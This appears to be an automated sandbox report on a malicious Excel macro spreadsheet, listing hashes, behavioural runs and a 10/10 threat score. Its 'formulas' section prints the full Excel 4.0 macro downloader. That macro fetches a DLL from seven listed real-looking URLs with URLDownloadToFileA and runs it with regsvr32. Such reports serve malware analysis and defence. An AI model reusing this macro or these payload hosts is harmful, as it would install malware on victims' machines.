General
-
Target
6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9
-
Size
29KB
-
Sample
241121-az7l3s1pfn
-
MD5
3e3a01295ed9448b02ba3f26ad3b142c
-
SHA1
4e592a05b7d687745e245b9d3c8153c7bf80f3ca
-
SHA256
6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9
-
SHA512
4c612b17db67103ad34a5cae43375dd1c39ffe253d24eb86d904b1f47a21ac030b07562a8296dc3638329a982198cc98d5a66f66ac7dd1d3a9c121b64539d5ae
-
SSDEEP
384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl
Behavioral task
behavioral1
Sample
6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://iqraacfindia.org/wp-admin/dG/
https://he.adar-and-ido.com/wp-admin/xk7D/
https://www.digigoal.fr/wp-admin/VfU0aIj/
https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
https://al-brik.com/vb/mMQlbHPCX/
https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
https://biantarajaya.com/awstats-icon/VR5wDEvBj/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0) =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0)) =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0)) =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll") =RETURN()
Extracted
https://iqraacfindia.org/wp-admin/dG/
https://he.adar-and-ido.com/wp-admin/xk7D/
https://www.digigoal.fr/wp-admin/VfU0aIj/
https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
https://al-brik.com/vb/mMQlbHPCX/
https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
https://biantarajaya.com/awstats-icon/VR5wDEvBj/
Extracted
https://iqraacfindia.org/wp-admin/dG/
https://he.adar-and-ido.com/wp-admin/xk7D/
https://www.digigoal.fr/wp-admin/VfU0aIj/
Targets
-
-
Target
6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9
-
Size
29KB
-
MD5
3e3a01295ed9448b02ba3f26ad3b142c
-
SHA1
4e592a05b7d687745e245b9d3c8153c7bf80f3ca
-
SHA256
6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9
-
SHA512
4c612b17db67103ad34a5cae43375dd1c39ffe253d24eb86d904b1f47a21ac030b07562a8296dc3638329a982198cc98d5a66f66ac7dd1d3a9c121b64539d5ae
-
SSDEEP
384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-